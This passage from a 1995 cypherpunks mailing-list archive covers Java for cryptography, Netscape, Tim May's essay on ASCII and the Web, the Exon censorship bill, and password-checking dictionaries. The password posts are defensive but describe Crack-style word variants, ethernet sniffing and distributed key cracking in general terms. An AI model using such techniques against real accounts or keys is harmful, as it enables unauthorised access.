IrwOjcrnkD36EliwXsX7V1chNjfOSFyE9IDWG5RV9S1qBTSbTMVbUHA3w+A2ejgL YKaJv97iB/A= =a8iN -----END PGP SIGNATURE----- From cman at communities.com Fri Jul 21 11:26:32 1995 From: cman at communities.com (Douglas Barnes) Date: Fri, 21 Jul 95 11:26:32 PDT Subject: Java (was Netscape: the big win) Message-ID: >So, what would be a "cypherpunk" thing you could do with Java? I know >I can use it to download little applets to my system to do animations. >What can it do to enhance my privacy? What would be the Java equivalent >of PGP? > Portable PGP with a GUI interface that didn't suck? Note that I'm championing the use of Java as a portable language, with a portable windowing toolkit, that will (real soon now) have commercial tool support from a variety of vendors, as well as free tools available on the net (the best of both worlds.) The whole issue of how to do cryptography with applets is kind of complicated, and is something Amanda and I have been working on very dilligently. They hard part is determining what the interface is between trusted code (that you have installed on your machine, or ultimately, that you've specifically designated as being trusted based on secure hash) and untrusted code that comes from random web sites on the net. In general, for any general-purpose cryptography tool, you're going to want almost all of it to be based on locally-installed, trusted code. Certain protocols can actually work much better using applets, but they should only be allowed to access a very narrow set of local routines that directly interface with the user. (e.g. "Do you really want to sign this?", "Confirmed signed by so-and-so.", etc.) This is, however, a separate issue from the use of Java to do standalone applications. See: http://www.cs.utexas.edu/users/achou/JCrypt/packages.html From shamrock at netcom.com Fri Jul 21 11:31:42 1995 From: shamrock at netcom.com (Lucky Green) Date: Fri, 21 Jul 95 11:31:42 PDT Subject: Netscape the Big Win(dows) Message-ID: <199507211829.OAA08315@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , tcmay at sensemedia.net (Timothy C. May) wrote: >Out of curiousity, the phrase "grown out of Netscape," aside from the >implied barb, means what? Just what am I missing and what do I need to >"grow out of"? Tim, I won't presume to speak for Robert, but I can tell you this: Netsacpe/Mosaic is an awsome program. It fundamentally changed the way I use and access the net. Going from terminal emulation to the present version of Netscape, as you have, can not fail to impress an individual. This is similar to the awe one might feel when going from a typewriter to a computer with MS Works preinstalled. But we both know that MS Work is often not the best tool for the job. It spreadsheet pales compared to Excel, its wordprocessor lacks features, etc. Consequently, many people that buy a computer packaged with Works end up replacing or augmenting Works with other, specialized, programs that do a better job at many of the tasks that Works claims to do. Netscape is, in many regards, just like Works. It has a sub-standard newsreader, a featureless mailer -- but a very nice browser. So many people use Netscape for a browser and other programs for other tasks, because other programs are better suited for it than Netscape. When Robert mentioned that he was wondering how you would think about Netscape in six months, he was perhaps thinking what most experienced Mac using netsurfers know: The various leading Mac Internet programs are excellent modular tools that, thanks to cooperation between the various authors, are tighly integrated. Often, the same key combinations that work in one progamm, work in the other. They are small, they are fast, and they can call each other. The only odd man out is Netscape, which tries to do it all by itself and therefore does nothing right. Once someone tries Anarchie for ftp, or one of the enhanced (current leader seems to be Y.A.) Newswatchers for USENET, there is no going back to just Netscape. I remeber writing here once that after someone tries surfing the Web with Mosaic, there is no going back to just using lynx. The same holds true for Anarchie, Newswatcher, Eudora -- and Netscape. Let's talk in six months (no barb, just confidence that you will learn new things as time goes by), - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMA/x6SoZzwIn1bdtAQGXNgGAm2v5m3S8rJ4UWOpWSR+JD6KU1zscjsEm xU89gO9nuJzUXk5JbOM0EhAWc9bi/kER =Nwn1 -----END PGP SIGNATURE----- From tcmay at sensemedia.net Fri Jul 21 11:36:05 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Fri, 21 Jul 95 11:36:05 PDT Subject: "Where is the Market?" Message-ID: I want to elaborate on the words from last December that I just posted, in response to some comments about how I had just "discovered" the Web. L. McCarthy just had some good points about differing privacy/political goals here on this list. When we first formed, almost three years ago, one of the first things we did at a physical meeting--and the issue was echoed on the new mailing list--was to conduct a poll of who was using what mail tools, e.g., pine, elm, emacs, Microsoft Mail, MCI Mail (?), Lotus Notes, Eudora, etc. The results--which should be in the archives for sometime around November-December 1992--were, as expected, all over the map. No clear winner. The reason for the poll was obvious: to determine what sort of target markets the various PGP integrators would have. Even then, there were religious wars, with, for example, the emacs crowd arguing that PGP should be integrated into emacs and then the world could just switch to emacs (as they should have long before :-)). Now I wish I could draw pictures here---and that I can't draw pictures here and still communicate with most of you here makes an interesting point about the still-dominant nature of ASCII, which ain't about to change anytime soon for lists like this---so I could better explain my "stable attractors" line of reasoning. But I'll do it instead with more words. Here's an elaboration on my points made last December 15: "I see two "stable attractors" for text/graphics/multimedia/etc. sent over the Net:" What I mean by "stable attractors" are the "islands" or regions in product space that have solidity and success. Leading commercial products are obvious examples, with a cloud of related or ancillary products supporting them. Product versions are like a chain of these islands. As with "attractors" in general (and I assume everyone on this list has read much about attractors, usually in the context of strange attractors), there are not many "occupied" regions in the nether-realm between attractors. That is, between the islands lies open water. "Survival" is difficult in these open waters. My main model for software, borne out by everything I see, is that this "island colonization" model is appropriate. "1. Straight text, ASCII, 80 column format. All systems can handle this, all mailers and newsreaders can handle it, it's what the Usenet is essentially based upon, and it gets the job done. It meets the needs of 95% of us for 95% of our needs." By this I mean just what this list is doing _now_. ASCII is the de facto lingua franca. People with PCs, various operating systems on their PCs (DOS, Win3.1, Win95beta, Linux, OS/2, NeXTStep, Solaris, etc.), Macintoshes, terminals, Amigas, Ataris, Suns, SGIs, NeXTs, and so on, are all mostly able to read what is distributed here. Deviations occur, but mostly unintentially or as "experiments." Occasionally people will still try to send NeXT-formatted mail--I forget what it was called--and various people send their messages as "attachments," even when the text is apparently just straight ASCII. (Hint to the attachment-senders: I periodically go into the "Attachments" folder on my system and empty it of the unread big and little attachments that have accumulated in it...others have said they do the same. So, if your message will fit into the standard text/ASCII "primary format" of the Cypherpunks list, that is how you should send it...and if it _isn't _ straight text, but instead includes attached spreadsheets, JPEG movies of the Waco raid, etc., you might ask yourself just how many people will bother to read or view your message?) Hence my comment that "the written word" is a massively stable, heavily colonized "island" or "attractor." It can be handled in foreign languages, with some difficulty, and on nearly any computer system in the world. It is the language of legal briefs, of economic reports, of crop reports, and of a zillion other forms of communication. Pure text is powerful stuff. But what about pictures, illustrations, diagrams? Magazines and books use them widely, so why can't we? And what about styled text, footnotes, superscripts, hypertext links, etc.? Well, in a different world we might have adopted standards earlier than we did and such things might be more common and acceptable today. (For those who will argue that it is "possible" to exchange e-mail with embedded diagrams, equations, footnotes, etc., "sure." But ask yourself how many times you have ever actually _done_ this, with friends and e-mail correspondents? Some who have done this point out that it usually involved folks within corporations who can standardize on the tools and default settings to make this transparent...then they can send richly-formatted stuff without excessive work. And how many other mailing lists, besides Cypherpunks, have such embedded diagrams and illustrations? I'm not talking about the Web here--I'll get to it in my next point--but about what this list is and what NetNews, for example, is. What will "the masses" likely use to implement a richer communications channel, one that encompass pictures, illustrations, movies, spreadsheets, etc.? What will be the _next_ big island people colonize? (Which is of obvious interest for the deployment of crypto to users.) >From Dec. 15: "2. The Web, for graphics, images, etc. This will be the next main stable attractor, deployed on many platforms. (I'm assuming the debate here about Netscape standards does not imply much of a fragmentation, that Mosaic, Netscape, MacWeb, etc., will all basically be able to display Web pages in much the same way.)" Enough people are starting to "surf the Web" (whatever you think of that expression) that this is becoming the _de facto_ next attractor, or island. _Millions_ of users will have whatever tools and "helper apps" in their versions of Mosaic, Netscape, MacWeb, etc. such that this will be the platform/environment of choice. As the browsers add e-mail (receiving, as most or all can send mail), and as applets/helpers proliferate, then these platforms/environments will allow new forms of e-mail to finally become _widespread_ (note that I did not say "possible," but instead said "widespread"). Many folks I have expressed this view to have said "But the Web is not a two-way medium like e-mail." That is, most people spend most of their time on the Web "reading" (viewing) the stuff others have put on the Web. Three points: 1. This is changing already, as "feedback" is included on pages. This feedback is beginning to look like local newsgroups, and will become more so (IMO). (Speculation: The current Usenet "feed" is of course huge. It may get replaced, via evolution/revolution, by a shift to a Web-oriented system of local newsgroups. What I mean by this is that instead of reading, say, "alt.cypherpunks," one points one's browser at "http://www.cypherpunks.org/" and uses one's various Web tools to browse, sort, search, read, and respond to comments of others. BTW, this could be done today, and might be a better alternative than creating "alt.cypherpunks." The current approach of shipping the entire Usenet feed to all the sites that carry it is likely to eventually break down.) (Even more speculation: Currently I point my Netscape at which news server I wish, from a choice of several. The idea of "subscription-based" News sites is an interesting one. I might pay extra money for a site that is very current and carries all News groups, while parents might pick a site that is sufficiently sanitized for them, a site they let their children access. Much more to say here, but I see several Cypherpunks themes.) 2. The easy-to-use integration of helper apps into Web browsers will confer the same capabilities on mailers that are now associated with these Web browsers. (Again, don't tell me what _your_ mailer can now do, look to what the millions of people are using...they'll gain a lot when their mailers, whether part of Netscape or MacWeb or not, can automatically handle things their browsers can now handle.) 3. The main development seems to me to be in Web tools these days. Being a user of "tin" for several years, and seeing minimal development of it the past two years, I've seen tin get almost no new features. Ditto for "elm," my mailer (when logged-on to Unix systems). (Before you comment, I can't speak for trn, nn, rn, etc., or mailers such as pine. But friends of mine have told me the same stagnation is happening with other mailers and newsreaders. Many of the developers of tin, elm, archie, gopher, etc., have moved on to bigger and better things.)) So, given that it has long been recognized as a valid Cypherpunks goal to see what people are using for mail and newsreading, I think an analysis of what's likely to be popular amongst the "masses" is valid. (I don't disdain the "masses," at least not in this context. The needs of a lawyer wanting to communicate securely with his client are not the needs of a C hacker wanting to configure his Linux box to auto-sign his emacs messages.) My views on the Web have *not* changed dramatically since last fall and winter when I was talking in these terms, though all I had then was a text-oriented browser (lynx), and it was not very exciting (as Ray Cromwell also notes). (And I recall this discussion on the importance of the Web going on several times earlier, including a prediction/hope by the Extropians list organizers, including Harry Shapiro (Hawk) that the Web could be the solution for distributing graphics-content mailing lists...this was around 1993 sometime.) I'm definitely not "dissing" Unix, though I personally never had much use for it. The world is made up of all kinds of people. Some are hackers, some are expert cryptographers, some are lawyers, and so on. The needs of a lawyer for computer tools and writing aids are quite a bit different from those of someone who wants to put together a Linux box for C hacking. If I sound snide in my comments about Linux, I don't mean to be. What I mean is that very, very few users, even fairly sophisticated users, are going to be doing their work on Linux boxes. (If I'm wrong about this, and Linux becomes a serious deployment system--as opposed to a Sun-killer, which is what it looks like now--then I'll acknowledge that I was wrong.) As cheap boxes to deploy remailers and Web sites on, Linux sounds like a win. I'm unconvinced that it has a future for _general_ users, though. (And by general users I don't mean computer-phobic newbies, I mean the folks buying Windows in the tens of millions and Macs in the millions per year. Wider use of crypto means these users, not just the current PGP users.) Nothing has changed my view that the Web is clearly the next big attractor, the next big island. Integrating crypto into it is likely the next big win, which is how this latest thread started. (And by "integrating crypto into it" I don't necessarily mean getting the source code from Netscape or Spry or whomever and adding it...the integration can be done in multiple ways, I think, and as several folks here are already thinking about.) In any case, the future will unfold as it unfolds. Maybe I'm right, maybe not. Maybe only partially right. Debate is healthy, and at least this debate is closer to being on-topic than discussions of red mercury (and the even rarer columbium-niobum alloys the Japanese have developed) and Cypherpunks logos. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From lynnowe at netcom.com Fri Jul 21 11:47:56 1995 From: lynnowe at netcom.com (Owen Lynn) Date: Fri, 21 Jul 95 11:47:56 PDT Subject: Phrack SummerCon - I enjoyed your talk Message-ID: Eric, I was there in 'lanta when you gave your talk at SummerCon, and I thoroughly enjoyed it. I was especially intrigued by some of the, um, fun you can have with corporations. Are there any books I can read that are sort of _Fun with Your Corporation for Beginners_? fnord From frissell at panix.com Fri Jul 21 12:06:48 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 21 Jul 95 12:06:48 PDT Subject: New Form of DOS Attack Message-ID: <199507211902.PAA28170@panix.com> Apropos of nothing... Suppose that you are in charge of a separatist compound/Blacknet POP/Meth Lab and you are worried that The FBI/BATF/DEA/FEMA/UN jackbooted thugs with their black helicopters are planning a little "dynamic entry." If you want to deny the Feds the opportunity for some energetic service of process, all you have to do is hire Rodney King to move in. Once he is onsite, the Feds will be helpless. Just keep your Greenpeace Special (tm) sat cams focussed on old Rodney and you have absolute immunity from all incursion. Too bad we can't clone him. DCF "Goodby cruel world, I'm off to join the circus. Hey, Mr. Barnum save a place for me." From frissell at panix.com Fri Jul 21 12:17:35 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 21 Jul 95 12:17:35 PDT Subject: New Form of DOS Attack Message-ID: <199507211917.PAA01722@panix.com> Apropos of nothing... Suppose that you are in charge of a separatist compound/Blacknet POP/Meth Lab and you are worried that The FBI/BATF/DEA/FEMA/UN jackbooted thugs with their black helicopters are planning a little "dynamic entry." From stewarts at ix.netcom.com Fri Jul 21 12:18:19 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 21 Jul 95 12:18:19 PDT Subject: Today's Internet discussion on Science Friday Message-ID: <199507211916.MAA18932@ix6.ix.netcom.com> Hi! I just saw that you'd be discussing the Exon Censorship Bill discussion on today's Science Friday on Talk of The Nation; I found out from a mailing list on the Internet, and had time to tune in, but not enough advance warning to attack-dial and become the one lucky caller who actually got on :-) You picked a well-balanced set of interviewees; I was a bit disappointed by the time balance between discussion and callers. It would also be nice if you extended the on-line discussion to the Internet as well as the commercial services AOL and Compuserve, since that extends the collection of people who can be involved in the discussion. [Summary for list-folk - the speakers were Bruce Taylor of National Law Center for Children and Families (sounds like a Pat Robertson thing), Dan Weitzner of CDT, and Larry Maggoth(sp?) who wrote the Child Safety on the Info Superhighway pamphlet. Larry led off, Taylor dominated the discussions, Weitzner mostly wimped out. Everybody agreed that there's obscenity on the Internet if you want to find it, and that it's great that we have obscenity laws to punish Bad People and Protect Kids; Rimm's bogus numbers weren't discussed, the indecency-vs-obscenity was starting to be discussed but got cut off by time.] #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 From lethin at ai.mit.edu Fri Jul 21 12:27:44 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Fri, 21 Jul 95 12:27:44 PDT Subject: Cyberporn on NPR today In-Reply-To: <3uopsm$cts@life.ai.mit.edu> Message-ID: <9507211927.AA00508@toast> >But I expect it to focus on the technology questions, not the shrill >"Save our children from the plague..." hysteria. Only two callers through, first one should have hung up when he heard all of his arguments made (better) in the first half hour. Second caller asked whether the Pynchon mailing list he's on would have to censor itself if the Exon ammendment passed (seemed a decent point - succinct too). The rest of the time was the same old political debate with a few moments about Surfwatch. Equal time given to the opposition, who spoke about the horrors of unspeakable besiality, rape, etc. -- --- Concurrent VLSI Arch. Group 545 Technology Sq., Rm. 610 MIT AI Lab Cambridge, MA 02139 (617)-253-0972 From stewarts at ix.netcom.com Fri Jul 21 12:32:40 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 21 Jul 95 12:32:40 PDT Subject: big word listing Message-ID: <199507211931.MAA21230@ix6.ix.netcom.com> >| As a security measure, I am trying to get a massive dictionary of words >| together, and each time a user changes his/her password, it checks the list to >| see if the password is in it. My question is, are there any pre-built lists of >| this nature? I am currently only using a spelling dictionary, and would like >| something a little bigger. > > Look on coast.cs.purdue.edu in the password/Crack areas. There are also Grady Ward's Moby Words and related moby-listings, though things like Crack will probably do a more thorough job of variants like word, drow, w0rd, word0, drow0, word1, 0word, 1word, word1word, etc. which people use to complicate their passwords. Caveat: If you're building it on Unix, _don't_ set up the command to take the proposed password on the command line, e.g. "checkpass foobar2", since that makes it visible to anyone who runs ps. Feed it through stdin, or set it as a variable and fork, or something like that. And remember that binary searches are _far_ faster than reading whole dictionaries, and hashes are even faster if you're willing to preprocess more. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 From frissell at panix.com Fri Jul 21 12:41:49 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 21 Jul 95 12:41:49 PDT Subject: New Form of DOS Attack Message-ID: <199507211941.PAA06535@panix.com> Apropos of nothing... Suppose that you are in charge of a separatist compound/Blacknet POP/Meth Lab and you are worried that The FBI/BATF/DEA/FEMA/UN jackbooted thugs with their black helicopters are planning a little "dynamic entry." If you want to deny the Feds the opportunity for some energetic service of process, all you have to do is hire Rodney King to move in. Once he is onsite, the Feds will be helpless. Just keep your Greenpeace Special (tm) sat cams focussed on old Rodney and you have absolute immunity from all incursion. Too bad we can't clone him. DCF "Goodby cruel world, I'm off to join the circus. Hey, Mr. Barnum save a place for me." From jlasser at rwd.goucher.edu Fri Jul 21 12:48:27 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Fri, 21 Jul 95 12:48:27 PDT Subject: Something occured to me In-Reply-To: Message-ID: On Fri, 21 Jul 1995, Robert A. Hayden wrote: > Whent he republicans took over the congress, they instidtued that > Contract on America. One of the first laws that was passed (by both > parties, I might add) was a law that made lawmakers abide by the same > laws that "normal" people abide by. If you believe that... Well, it is true, under certain limited circumstances, but it doesn't make them criminally liable for writing bad laws, nor can it. Jon ------------------------------------------------------------------------------ Jon Lasser (410) 494-3253 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From jlasser at rwd.goucher.edu Fri Jul 21 12:51:50 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Fri, 21 Jul 95 12:51:50 PDT Subject: Louie Freeh In-Reply-To: Message-ID: On Fri, 21 Jul 1995 ben at reston.opnsys.com wrote: > I was just listening to the G. Gordon Liddy Show, he was talking to a > reporter for the American Spectator, which has a piece on our favorite > FBI director Freeh. From the sound of the reporter the story is very > damming, on everything from Waco to the entrappment of Malcolm X's > daughter. Having experience using American Spectator as a source for research papers, I can state without any doubt in my mind that anything I read in AS I attempt to find proof of their claims somewhere else. Not to say that Freeh is good, or that the claims aren't true this time (I haven't read it, yet..), but their articles in the past have had glaring lies^H^H^H^H inaccuracies. It's like reading the traditional liberal media... they'll twist anything to fit their preconceptions. Jon ------------------------------------------------------------------------------ Jon Lasser (410) 494-3253 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From bailey at computek.net Fri Jul 21 12:54:02 1995 From: bailey at computek.net (Mike Bailey) Date: Fri, 21 Jul 95 12:54:02 PDT Subject: The OS wars and DOOM... In-Reply-To: <199507211218.AA20295@tyrell.net> Message-ID: On Fri, 21 Jul 1995, Phil Fraering wrote: > > This is a point I want to bring up regarding the current > OS war being waged on this group. > > Apps have migrated from Unix to the Mac and the PC before in > the past. In the further past, this has included curses and > other-types-of-text-control packages such as PC versions of > Emacs and nethack and the like. > > Of course, this was not done with graphical programs; everyone knows > that graphics isn't Unix's strong suit, and what it has is so different > from the PC, etc., blah, blah,... > > Except that for the past two or three years, it's been WRONG. > > One of the hottest games on the PC, DOOM, was originally written in > Nextstep (a Unix variant, and a ghetto even amidst the "ghetto" of > Unix) and then ported to the PC. Very good example ... I think you will find that many programs are physcially coded on a unix box and crossed compiled using something like gcc or g++. One of the last steps is add the gui interface if required, compile on the native target platform using the compiler of choice for that target. I have a friend who is coding an OS/2 project and using AIX as the development platform. The project started by downloading some source code for a unix platform that essentially performed the desired task studying it and modeling their code after the source code off the net. Why reinvent the wheel ? > I don't know which Unix environment they're using in the "master" > development effort before porting to other environments today. > > Given that games usually program close to the hardware, and are > therefore the _most_ difficult things to port from one environment > to another, it really makes one wonder why Excel isn't out for > (for example) Linux or BSD today. Very true of games and that is one of the reasons DOS is a popular platform for games ... direct hardware control is possible and the hardware architecture is only INTEL x86 ... although the technology is evolving beyond this point rapidly. Another reason for the large game market with DOS machines is simply the huge home market where DOS is the undisputed leader. -Mike ************************************************************************** * Mike Bailey (hm)214-252-3915 * * AT&T Capital Corporation. (wk)214-456-4510 * * email bailey at computek.net host bambam.computek.net * * "Remember you can tune a piano but you can't tuna fish -Joe Walsh" * * http://www.computek.net/public/bailey * ************************************************************************** From jim at acm.org Fri Jul 21 12:58:26 1995 From: jim at acm.org (Jim Gillogly) Date: Fri, 21 Jul 95 12:58:26 PDT Subject: big word listing In-Reply-To: <00993AF518E527C0.00011F64@sanchez.com> Message-ID: <199507211958.MAA19853@mycroft.rand.org> > "It's supposed to crash like that." writes: > As a security measure, I am trying to get a massive dictionary of words > together, and each time a user changes his/her password, it checks the list t o > see if the password is in it. My question is, are there any pre-built lists of > this nature? I am currently only using a spelling dictoinary, and would like > somthing a little bigger. Yes, there are -- see ftp.ox.ac.uk for a lovely set of them. This is a reasonable approach, but it's insufficient: you also need to check lots of variants on the words. I'd suggest looking at the code in Programming Perl (Larry Wall and Randal L. Schwartz) for checking potential passwords, and I'd suggest looking at the initial ruleset used by Crack, the Unix password cracking tool; the same rules should be good for any kind of password scheme. Also you should be aware that cracking passwords is passe' these days: it's much easier to run an ethernet sniffer and gather them wholesale. Every little bit helps, though. Jim Gillogly Sterday, 28 Afterlithe S.R. 1995, 19:54 From Doug.Hughes at Eng.Auburn.EDU Fri Jul 21 13:02:32 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Fri, 21 Jul 95 13:02:32 PDT Subject: big word listing In-Reply-To: <00993AF518E527C0.00011F64@sanchez.com> Message-ID: >As a security measure, I am trying to get a massive dictionary of words >together, and each time a user changes his/her password, it checks the list to >see if the password is in it. My question is, are there any pre-built lists of >this nature? I am currently only using a spelling dictoinary, and would like >somthing a little bigger. > > > You're re-inventing the wheel. look for npasswd or passwd+. Both do things like that. Or, better yet, don't use dictionaries at all (they're out of date as soon as they're made available). Use rules that force your users to choose good passwords (just don't be too Draconian. ;). We have a rule that says a user must choose at least one upper case character, one lower case character, and one number, symbol, or control character in his/her password. It's met little resistance, a few complaints, and it's immune to most dictionary password schemes. The only other restriction is that they must have at least 6 characters in their passwords. That was already "mostly" enforced, so there was no problem there. This prevents people from picking passwords like the name of a significant other, the name of a place, or some foreign language word that normal dictionaries wouldn't necessarily catch, but some password cracking program "might" (depending on who has the more recent dictionary). This really is more along the charter of comp.unix.security though, and not cypherpunks (IMHO). -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu "Real programmers use cat > file.as" From andrew_loewenstern at il.us.swissbank.com Fri Jul 21 13:37:47 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 21 Jul 95 13:37:47 PDT Subject: Java (was Netscape: the big win) Message-ID: <9507212034.AA00995@ch1d157nwk> > So, what would be a "cypherpunk" thing you could do with Java? I > know I can use it to download little applets to my system to do > animations. What can it do to enhance my privacy? What would be > the Java equivalent of PGP? How about the old-standbys: remailers. Mixmaster is definitely where the technology is at, but it requires a client to use... Of course, with Java, there is the potential that _any_ user from any platform could connect to the Mixmaster Web page, get the client software, and start using the remailer network. Without having to compile, know anything, etc... If a Mixmaster client were available in Java (and I'm pretty sure it can be done) then suddenly everyone who previously could only use the penet server can now also use Mixmaster. With more people using the remailer network, all of them with Java clients, the possibility of for-pay remailers could become reality (no promises that you'll get rich though). There are many crypto-anarchy applications as well: Key cracking. If you can write a key-cracker and keyspace fetcher in Java, then people can join key cracking efforts as easily looking up an URL. It may not be nearly as efficient as the highly optimized C versions used in the current RC4-40 efforts, but there's going to be millions of potential workers this way. If you were charging money to break keys (or you were looking for keys that are very valuable to you), you could set up the worker client to accept e-cash for in return for searching keyspace "Click here to earn money while you aren't using your machine..." Ensuring that workers are actually searching the keyspace and other implementation details is left as an exercise for the reader. e-instrument or information exchanges, with Java interfaces for bidding, buying, selling, etc... DataHavens, which would probably require complex (internally) software to use. I'm sure the online casino people are salivating over the prospects too... Basically any fancy crypto application that requires a custom client to operate... Since its platform independent, efforts will be put to better use as well. andrew From jgrubs at voxbox.norden1.com Fri Jul 21 13:40:02 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Fri, 21 Jul 95 13:40:02 PDT Subject: "Hey Phil! Stop telling people *not* to use PGP!" (plus: "help me with my PGP Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Bryce Wilcox writes: > And I say "No no no, using a key which you got through the Net is better > than using no key at all, just be aware that if someone *really* wanted > to spy on you that they could have tampered with it. When you see Cousin > Joe next Christmas you can compare keys with him and make sure you have the > right one." I suppose one could always send Cousin Joe an encrypted message and see if he can read it..... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMBAPON74r4kaz3mVAQGoXQP9HYxFLJ3BEs5YhJ3Yaf3NGbUTIwB3pBw+ QNAzqiuKcNQmQ8/EZ160FK8JeeKAwMcSHA/a+/coG5+82DEiDfbkyLRXJK60c+j3 jVksrm3jxd9nfBk1SrWddHj6SYg8+0Rxz9aNFkfmwcNWJVPNcDkwvzAHZ1wO9rqZ gPaq8xIjfAA= =1I7d -----END PGP SIGNATURE----- From trost at cloud.rain.com Fri Jul 21 13:44:50 1995 From: trost at cloud.rain.com (Bill Trost) Date: Fri, 21 Jul 95 13:44:50 PDT Subject: The OS wars and DOOM... In-Reply-To: <199507211218.AA20295@tyrell.net> Message-ID: Phil Fraering writes: Given that games usually program close to the hardware, and are therefore the _most_ difficult things to port from one environment to another, it really makes one wonder why Excel isn't out for (for example) Linux or BSD today. Microsoft has lots to lose from making software available to systems that "comptete" with MS-DOG and Windoze. It's clearly in their best interests to not make their software run under Unix and/or X11 (although WABI has some interesting implications in that regard). On the other hand, that would seem to imply that it's in a lot of other people's interest to port their software -- every little bit of leverage against Microsoft helps. From jgrubs at voxbox.norden1.com Fri Jul 21 13:50:03 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Fri, 21 Jul 95 13:50:03 PDT Subject: "Hey Phil! Stop telling people *not* to use PGP!" (plus: "help In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) writes: > -----BEGIN PGP SIGNED MESSAGE----- > > Bryce Wilcox writes: > > > And I say "No no no, using a key which you got through the Net is better > > than using no key at all, just be aware that if someone *really* wanted > > to spy on you that they could have tampered with it. When you see Cousin > > Joe next Christmas you can compare keys with him and make sure you have the > > right one." > > I suppose one could always send Cousin Joe an encrypted message and see if he > can read it..... PS -- To make sure you hear back from him, tell him in the message that you won $50,000,000 in the Italian lottery (which doesn't notify the IRS). If you also hear back from the IRS, let us know -- FAST. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMBASNt74r4kaz3mVAQFz9wP+Ks1WkIJcBBUAX5QpJbJZDc+ECElDIh2a sZ0gbcUrGwUDcCUdXtcmYnmewlbz6BC1E3BNi6Mrav3Dqy5tDretl6ZcU3xvoCg7 MQplUgildLu4/BvFLDPzaJa73ngQvIRpXfq0/YZ2lNOMVjUiTc5VER6OSYPiZI4S cOFEdEkQXLk= =LW4l -----END PGP SIGNATURE----- From mech at eff.org Fri Jul 21 13:58:51 1995 From: mech at eff.org (Stanton McCandlish) Date: Fri, 21 Jul 95 13:58:51 PDT Subject: Why no action alert, coalition opposing S. 974? In-Reply-To: <300f5b5a.flight@flight.hrnowl.lonestar.org> Message-ID: <199507212057.QAA15341@eff.org> We've not "bowed out" on this bill, it's just not significant enough a threat (yet) to warrant stirring up a lot of activism about it - which would detract from the focus on the CDA and it's clones. We'll be tracking this bill and will certain help form a campaign against it if it looks to be going anywhere. In the mean time, we're issuing an analysis of it, and will keep the net informed. -- Stanton McCandlish
mech at eff.org
Electronic Frontier Foundation
Online Services Mgr. From chrisg at chrisg.itg.ti.com Fri Jul 21 14:20:19 1995 From: chrisg at chrisg.itg.ti.com (Chris Gorsuch) Date: Fri, 21 Jul 95 14:20:19 PDT Subject: big word listing Message-ID: <199507212117.QAA00160@chrisg.itg.ti.com> The crack library points to some dictionaries which have not only real and "imagined" (literary) words, but also words from other languages as well. All in all a good resource. -see adams message for pointers However, the reason I write is if you decide to add users previously used passwords to the dictionary, make sure your "appendages" to the dictionary are secured. Users are notorious for forgetting to change or reusing on other machines the passwords from various servers. The advantage is that your users will never be able to reuse their old passwords. The disadvantage is that your admins can attempt to hack other machines using these passwords. A "cryptographic" solution would be to simply store a hash of the password rather than the password itself in the "appended" dictionary. A CRYPTOGRAPHIC solution would be to use one time passwords :). Chris Gorsuch chrisg at ti.com *I am not responsible for the content of the above message :) From tcmay at sensemedia.net Fri Jul 21 14:23:09 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Fri, 21 Jul 95 14:23:09 PDT Subject: Java (was Netscape: the big win) Message-ID: Personally, I think the whole recent debate here about Java, Netscape, TCL, Safe-TCL, Telescript, Linux, etc., has been very useful and stimulating. The detailed exposition of ideas by Ray Cromwell, Doug Barnes, Hal Finney, and several others is exactly what this list is all about. At 7:24 PM 7/21/95, Douglas Barnes wrote: >Note that I'm championing the use of Java as a portable language, >with a portable windowing toolkit, that will (real soon now) have >commercial tool support from a variety of vendors, as well as free >tools available on the net (the best of both worlds.) > >The whole issue of how to do cryptography with applets is kind of >complicated, and is something Amanda and I have been working on very >dilligently. They hard part is determining what the interface is >between trusted code (that you have installed on your machine, or >ultimately, that you've specifically designated as being trusted >based on secure hash) and untrusted code that comes from random >web sites on the net. Ray's list of the many applet-based applications (so to speak). this stuff Doug is working on, and Hal's ideas, all could lead to a next-generation of Web-oriented user tools. I have no idea, of course, which of the various languages and tools will succeed. But it's good to see so much interest the past year or two in new languages...it was looking for a while like C++ would be the only game in town. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, 